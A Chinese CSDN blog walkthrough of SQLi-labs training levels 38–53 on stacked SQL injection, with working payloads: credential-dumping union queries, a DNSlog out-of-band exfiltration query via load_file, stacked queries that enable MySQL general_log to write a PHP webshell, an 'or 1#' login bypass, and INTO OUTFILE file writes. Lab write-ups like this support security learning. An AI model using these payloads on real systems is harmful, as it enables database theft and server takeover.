SQLi-labs 堆叠注入 38-53关

最新推荐文章于 2024-11-08 18:30:00 发布
最新推荐文章于 2024-11-08 18:30:00 发布
阅读量166 收藏 1
点赞数
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a1219348778/article/details/126924999
版权

SQLi-labs 堆叠注入 38-53关

LESS-38

书接上回,这次我们一样是冲击LESS-38

但这次不耍小聪明,我们使用DNSlog+堆叠注入的方法,来过关。

上次的代码,直接爆库,无视堆叠部分

?id=-1' union select 1,(select group_concat(username) from users),(select group_concat(password) from users)--+

DNSlog是在某些无法直接利用漏洞获得回显的情况下,利用他来把像获取的出去外带出去。

DNSLog

注入时,需要利用到load_file()函数

在数据库中使用 select load_file('\\\\sql注入查询语句.a.com')

后面是网址,自行去网站上申请

DNSLog Platform

比如我们使用最简单的语句,select database()再组合上我们的dnslog进行使用

语句为

select (concat('\\\\',database(),'.68iiiz.dnslog.cn/abc'))

具体操作笔者不在展示,因为笔者靶机没有网络。

日志Getshell

方法观看自’国光’的sql笔记

需要条件:

  1. Web 的物理路径

  2. MySQL 可以读写 Web 目录

  3. Windows 成功率 高于 Linux

首先查看日志

show variables like 'general%'

查看general_log属性,也就是日志属性的装态,可以发现,是关闭状态

利用堆叠注入开启

?id=1';set global general_log ='on';set global general_log_file='你想要的目录/shell.php';

然后在查询中输入phpinfo代码

?id=1';select <?php phpinfo();?>

日志中的代码

然后利用网址访问该PHP即可获得权限。

tips:注意分号;一定要写,不然不能运行

该方法在win系统下比liunx成功率要高

LESS-39

拼接方式:id=$id

与38一致

LESS-40

拼接方式:id=('$id')

与38一致

LESS-41

拼接方式:id=$id

与38一致,只是无回显

LESS-42

拼接方式:id=‘$id’

42关一打开,给人一种24关的感觉,总觉得又是利用#符号,来屏蔽后方进行绕过修改密码。

但点击注册界面,和24关不同,他告诉我们如果需要账号,就自己黑进去。

那么我们就可以利用堆叠注入,进行inset into进去我们的账号密码

那我们直接使用万用密码绕过,进入到修改界面

login_user=admin&login_password=1' or 1#&mysubmit=Login

绕过后直接进入到界面,默认是登录到id1,也就是dumb账号。

同时也让我们得知到,dumb这个值所在的位置是有回显的,那么我们直接可以查询账号密码。

我们还是先查询完账号吧

login_user=admin&login_password=1' union select 1,(select group_concat(username) from users),3#&mysubmit=Login

然后使用24关方法#屏蔽修改可以

获取完账号密码修改可以

最轻松的就是直接使用堆叠注入在后方使用update直接更改账号密码。

LESS-43

拼接方式:username=('$username')

与42一致

LESS-44

拼接方式:username='$username'

与42一致,无报错信息,不能使用报错注入

LESS-45

拼接方式:username=('$username')

与42一致,无报错信息,不能使用报错注入

LESS-46

进入页面,根据提示,发现该关卡和之前都不同,输入的值是sort

查看代码

发现原来是写到了orderby 里面去了

拼接方式:order by $id

那就不能使用联合注入了,因为已经是在句末了

尝试用报错注入,发现有报错信息,那么使用报错注入就好了

报错注入一次只能查一个数据,接下来就是慢慢查,不过多赘述。

?sort=1 and updatexml(1,concat('~',(select username from users limit 0,1),'~'),3)#

LESS-47

拼接方式:ORDER BY '$id'

与46一致,拼接方式不同

LESS-48

拼接方式:order by $id

改关没有报错提醒,就不能使用报错注入了。

可以使用布尔盲注,或者延时盲注。

那我们可以使用导出数据的方法,将数据导出到文件里,然后再进行查看。

?sort=1 into outfile"你想要的存放地点.文件名.txt"

然后进行访问即可,如果导入不成功,那么就是因为mysql没有读写权限的原因。

那我们就要去开启权限

?sort=1 set secure_file_priv = ''

设置为空任何目录都可导入。

然后执行导出就可以

但实际上,直接写入一句话php代码,就可以做到获得权限完成注入。

LESS-49

拼接方式:ORDER BY '$id'

类似48

LESS-50

拼接方式:ORDER BY $id

类似46,可以报错注入。另外还可以使用堆叠注入。

LESS-51

拼接方式:ORDER BY '$id'

类似50

LESS-52

拼接方式:ORDER BY $id

类似50,无报错回显。

LESS-53

拼接方式:ORDER BY '$id'

类似-51,但无报错注入

陈十五不等式
关注
SQL注入-07】堆叠注入案例—以sqli-labs-less38为例
m0_64378913的博客
05-05 998
目录1 堆叠注入概述1.1 定义1.2 与union联合查询注入的对比1.3 局限性2 堆叠注入案例—以sqli-labs-less38为例2.1 实验平台2.2 实验目标2.3 堆叠注入实验步骤2.3.1 注入前准备2.3.2 判断注入点及注入类型2.3.3 判断回显列数及回显位置2.3.4 union注入获取库名表名字段名2.3.5 堆叠注入3 总结参考文章 1 堆叠注入概述 1.1 定义 英文为 stacked injection。 在SQL数据库中,每条语句是以;分开的,堆叠注入就是一次性注入并执
【合天网安】SQLi-Labs系列之堆叠注入
hehigoxqc606的博客
09-02 363
概念: Stacked injections:堆叠注入。从名词的含义就可以看到应该是一堆SQL语句(多条)一起执行。而在真实的运用中也是这样的,在mysql中,主要是命令行中,每一条语句结尾加分号;来表示语句结束。 堆叠注入使用条件 堆叠注入的使用条件十分有限,其可能受到API或者数据库引擎,又或者权限的限制只有当调用数据库函数支持执行多条sql语句时才能够使用,利用mysql_multi_query()函数,其只能执行一条语句,分号后面的内容将不会被执行。 任务一:基于GET型的堆叠注..
SQLi Labs Less-38 堆叠注入
热门推荐
wangyuxiang946的博客
06-22 1万+
第三十八请求方式为GET请求 , 注入类型为 单引号字符串型注入 第一步,测试注入方式 ?id=1' and false-- a SQL不成立时 , 结果不显示 , 固 单引号字符串型注入 , 源码如下 本题的重点在 mysqli_multi_query() , 可同时执行多条SQL , 即叠加注入 第二步,判断字段数 使用order by 排序 测试字段数量 ?id=1' order by 4 -- a 从第1列开始测试 , 直至报错 , 第4列开始异...
SQLi-LABS-Page-3-less-38-53注入教程
残阳泼茶香的博客
03-17 580
Lesson - 38GET - Stacked Query Injection - String堆叠查询 输入http://sql/Less-38/?id=1 ’ 报错显示说“1” 后面多了一个单引号, 那么就上手吧。 `http://sql/Less-38/?id=1%27%20order%20by%203%23,按着步骤来,http://sql/Less-38/?id=-1%20%2...
SQLi 38_sqli-labs 38
2401_86951321的博客
09-12 387
SQL不成立时 , 结果不显示 , 固 单引号字符串型注入 , 源码如下本题的重点在 mysqli_multi_query() , 可同时执行多条SQL , 即叠加注入
sqli-labs进阶篇 32~38
Lucky小小吴的小屋
02-06 1007
本文章主要讲述sqli-labs靶场第3238的通心得,从三方面讲述如何通,分别是注入点判断、源码分析、注入过程。文章若有不恰当之处,望指出~~
渗透测试SQL注入——Sqlilabs卡详解
人若有志,就不会在半坡停止。
10-18 1041
SQL注入sql注入点:url表单、搜索栏、动态网页(有参数提交的地方)、伪静态、请求头http的头部字段(user-agent、cookie、refer、x-forward-for)安全策略:先上waf 分类、 登录注入、 cms注入、article.php?id=、 数值型 、字符串型 Select * from tb where id=’ $id’ 、有回显 、无回显、 按注入的程度和顺序、 一阶注入 、二阶注入、 其他业务场景、延时盲注、布尔盲注。
web漏洞-SQL注入漏洞扩展(堆叠查询注入)-SQLi LABS 38到41讲解
ran的博客
01-19 746
比如在注入时,需要得到管理员的账号和密码,但是这个密码是加密的,且无法解密,此时便可以利用堆叠注入向管理员用户的表内进行插入用户数据,创建用户来登录迂回的注入数据库,但是前提是网站的管理员必须是高权限才能完全创建用户。因为是插入的数据,所以新插入的管理员用户的密码是自定义的,将用户数据插入之后,就可以实施登录了,此时便可以忽略密码无法解密的问题。区别就在于 union或者 union all 执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。”(返回执行的SQL语句并换行)。
sqli-labs靶场
05-30
5. **堆叠查询注入**:允许攻击者执行多条SQL语句,每条语句之间用分号分隔。 6. **存储过程注入**:如果应用使用存储过程来与数据库交互,攻击者可能能够注入恶意代码到存储过程中,执行不受控的操作。 7. **字符...
sqli-labs-master.zip
03-17
SQL-labs靶场包含了丰富的练习场景,涵盖了各种类型的SQL注入漏洞,例如:盲注、时间盲注、基于错误的注入、联合查询注入堆叠查询注入等。这些练习可以帮助你理解每种注入方式的工作原理,以及如何利用它们进行...
sqli-labs(38-53)
qq_43395215的博客
08-26 913
文章目录第38:第39:第40:第41:第42:第43:第44:第45:第46:第47:第48:第49:第50:第51:第52:第53: 第38: 这一挺简单的,就一个闭合判断,就可爆数据,但是,这一的目的不是查询数据,而是通过堆叠注入,对数据库执行操作 堆叠注入,就是利用sql中“;”是标志一句话结束,我们可以通过“;”将多个语句写入到sql语句中,这里的语句就不仅仅是指查询,还有增删查改 闭合判断: /Less-38/?id=1' and 1=1 --+ sql
sqli-labs 38-45
遇事不决冲冲冲
04-09 1138
38 堆叠注入:简单理解就是一条语句结束后再连接一条语句,这就叫堆叠注入。 举几个最简单的例子: 查询数据并创建一个数据库:select * from users;creat database test; 查询数据并删除一个数据库:select * from users;drop database test; 查询数据并插入数据:select * from users;insert into users(id,username,password) values(‘id’,‘username’,‘pas
SQLI DUMB SERIES-3
imomoe的博客
09-23 1121
?id=1’) 构造闭合 ?id=1’) --+ 注释后面内容 ?id=1’) order by 4–+ 4报错 3不报错 故有3列 ?id=-1’) union all select 1,2,3 from users–+ 在将?id=1改为?id=-1 使其为逻辑不正确值不显示输出 使得输出位输出后面的语句 ?id=-1’) union all select 1,2,table_name...
SQLI DUMB SERIES-7
weixin_34195364的博客
04-09 418
(1)查看PHP源代码 可以看见输入的id被一对单引号和两对圆括号包围 (2)根据提示:Dump into Outfile可知,此次攻击需要导出文件 (3)在第一获取 @@datadir 读取数据库路径@@basedir MYSQL 获取安装路径 ?id=2' union select 1,@@datadir,@@basedir --+ (4)修改...
SQL注入-堆叠注入
jokerhappy的博客
07-26 541
堆叠注入定义 Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。而在真实的运用中也是这样的, 我们知道在 mysql 中, 主要是命令行中, 每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection。 堆叠注入原理: 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而un
sql-labs闯38~45
qq_44663230的博客
09-07 1772
sql-labs 38~45 堆叠注入
sqli-labs通攻略38-53[Stacked Injections]
Keepb1ue的博客
08-10 5307
Stacked Injections 文章目录Stacked Injectionsless-38less-39less-40less-41less-42less-43less-44less-45less-46less-47less-48less-49less-50less-51less-52less-53 less-38 由于在这里使用了执行一个或多个sql语句的函数mysqli_multi_query。 所以可以尝试堆叠注入堆叠注入就是执行多条SQL语句,通过;分割;在实战中,由于正常数据库只会回显出
SQL注入堆叠注入sql-lab38
_Co1a
12-22 801
什么是堆叠注入SQL中,分号(;)是用来表示一条SQL语句结束的。试想一下我们在分号结束一个SQL语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而堆叠注入可以执行的是任意语句(增删改查)。 例如以下这个例子: 用户输入:1; delete from products服务器端生成的SQL语句为:select * from products where productid=1; delete from products当执行查询之后,第一条显示查询信息,第二条则是将整个表删除。
Redis - 事务
最新发布
ketil27的博客
11-08 511
Redis 的事务和MySQL的事务概念上是类似的.都是把⼀系列操作绑定成⼀组.让这⼀组能够批量执 ⾏.弱化的原⼦性:redis没有"回滚机制".只能做到这些操作"批量执⾏".不能做到"⼀个失败就恢复到 初始状态".不保证⼀致性:不涉及"约束". 也没有回滚.MySQL的⼀致性体现的是运⾏事务前和运⾏后,结果都 是合理有效的,不会出现中间⾮法状态.不需要隔离性:也没有隔离级别,因为不会并发执⾏事务(redis单线程处理请求).
MySQL注入实战指南——Sqli-labs教程解析
- **Less-38 至 Less-39** 提供了于如何实施堆叠注入的实践练习。 这份手册不仅适用于初学者,也对有一定经验的安全研究人员有价值,因为它提供了一个系统性的学习路径,从基础概念到高级技术,涵盖了SQL注入的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值